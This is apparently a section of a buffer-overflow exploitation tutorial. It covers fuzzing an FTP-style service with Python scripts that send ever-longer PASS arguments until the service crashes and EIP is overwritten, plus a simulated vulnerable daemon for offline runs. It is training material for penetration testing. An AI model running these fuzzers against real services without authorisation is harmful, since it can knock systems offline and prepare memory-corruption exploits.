# 4. Fuzzing

The following Python script can be modified and used to fuzz the remote entry points of an application. It sends increasingly long buffers as the argument of one command in the hope that one of them eventually crashes the application; the buffer length at which the crash happens is the starting point for the next step.

```python
import socket, time, sys

ip = "10.0.0.1"
port = 21
timeout = 5

# Build a list of buffers of increasing length: 100, 200, ... 3000 bytes.
buffer = []
counter = 100
while len(buffer) < 30:
	buffer.append(b"A" * counter)
	counter += 100

for string in buffer:
	try:
		s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		s.settimeout(timeout)
		s.connect((ip, port))
		s.recv(1024)                      # banner
		s.send(b"USER username\r\n")
		s.recv(1024)                      # reply to USER

		print("Fuzzing PASS with %d bytes" % len(string))
		s.send(b"PASS " + string + b"\r\n")
		s.recv(1024)                      # reply to PASS; times out or resets if the service died
		s.send(b"QUIT\r\n")
		s.recv(1024)
		s.close()
	except socket.error as e:
		# A refused connection, reset or timeout here normally means the
		# service has crashed: this length (or the previous one) is the culprit.
		print("Connection to %s:%d failed at %d bytes: %s" % (ip, port, len(string), e))
		sys.exit(0)
	time.sleep(1)
```

Note that the `send` call carrying the buffer must be changed to the command identified by spiking in the previous step; the format of that command can be read from the `EAX` register when the spike crashes the application. Also add or remove `recv` calls so that they match the number of responses the service sends to each command: an extra `recv` will block until the timeout, and a missing one leaves an unread reply that desynchronises the exchange.

Finally, run this script with the application attached to a debugger and check that the `EIP` register has been overwritten with A's (`\x41\x41\x41\x41`). Record the buffer length the script printed just before the crash, and make a note of any other registers that have either been overwritten or are pointing to space in memory which has been overwritten; both are needed in the following steps.
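The same loop as a reusable function, as an added example that is not part of the original page: `fuzz()` takes the command prefix found by spiking and any preliminary commands as parameters, treats a refused connection, reset or timeout as the crash signal rather than a generic "could not connect", and returns the buffer length at which the service stopped answering together with the last length it handled. `start_fake_service()` is a constructed stand-in for a vulnerable FTP-style daemon (an assumption made so the example runs offline, not a real target) that drops the connection and stops listening once a `PASS` argument reaches a chosen size, so the fuzzer can be exercised without a crashing binary.

```python
import socket
import threading
import time


def build_buffers(start=100, step=100, count=30):
    """Buffers of increasing length: start, start+step, ... (count of them)."""
    return [b"A" * (start + i * step) for i in range(count)]


def fuzz(ip, port, prefix=b"PASS ", pre_commands=(b"USER username\r\n",),
         buffers=None, timeout=5, delay=0.0):
    """Send each buffer as the argument of `prefix` and watch for the service dying.

    Returns (crash_length, last_ok_length): crash_length is the size of the buffer
    that was being processed when the service stopped answering (None if it
    survived all of them); last_ok_length is the largest buffer that got a reply.
    Raises RuntimeError if the target never answered at all.
    """
    if buffers is None:
        buffers = build_buffers()
    last_ok = None
    for payload in buffers:
        try:
            s = socket.create_connection((ip, port), timeout=timeout)
        except OSError:
            if last_ok is None:
                raise RuntimeError("target %s:%d unreachable" % (ip, port))
            return last_ok, last_ok          # previous buffer killed it before we reconnected
        try:
            s.recv(1024)                                  # banner
            for cmd in pre_commands:                      # e.g. USER before PASS
                s.sendall(cmd)
                s.recv(1024)
            s.sendall(prefix + payload + b"\r\n")
            if not s.recv(1024):                          # b"" means the peer closed on us
                raise ConnectionError("connection closed by target")
            s.sendall(b"QUIT\r\n")
            s.recv(1024)
            s.close()
            last_ok = len(payload)
        except OSError:                                   # reset or timeout mid-exchange
            return len(payload), last_ok
        time.sleep(delay)
    return None, last_ok


def start_fake_service(crash_at, host="127.0.0.1"):
    """Constructed stand-in for a vulnerable FTP-like daemon (an assumption for this
    example, not a real target): replies 200 to every command until a PASS argument
    of crash_at bytes or more arrives, then drops the connection and stops
    listening, the way a crashed process would. Returns the port it listens on."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, 0))
    srv.listen(5)
    port = srv.getsockname()[1]

    def handle(conn):
        """Serve one connection; return True if the simulated overflow was hit."""
        with conn:
            try:
                conn.sendall(b"220 fake ftp\r\n")
                buf = b""
                while True:
                    data = conn.recv(65536)
                    if not data:
                        return False
                    buf += data
                    while b"\r\n" in buf:                 # commands are CRLF-terminated lines
                        line, buf = buf.split(b"\r\n", 1)
                        if line.startswith(b"PASS ") and len(line) - 5 >= crash_at:
                            return True                   # "crash": no reply, connection dropped
                        conn.sendall(b"200 OK\r\n")
                        if line.startswith(b"QUIT"):
                            return False
            except OSError:
                return False

    def serve():
        while True:
            conn, _ = srv.accept()
            if handle(conn):
                srv.close()                               # the process is "dead": refuse new clients
                return

    threading.Thread(target=serve, daemon=True).start()
    return port


if __name__ == "__main__":
    port = start_fake_service(crash_at=1200)
    print("crashed at %s bytes, last good length %s" % fuzz("127.0.0.1", port))
```

Against a real target, the pair returned by `fuzz()` brackets the overflow: the offset found in the next step will lie between `last_ok_length` and `crash_length`, so those are the sizes to use for the pattern buffer.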
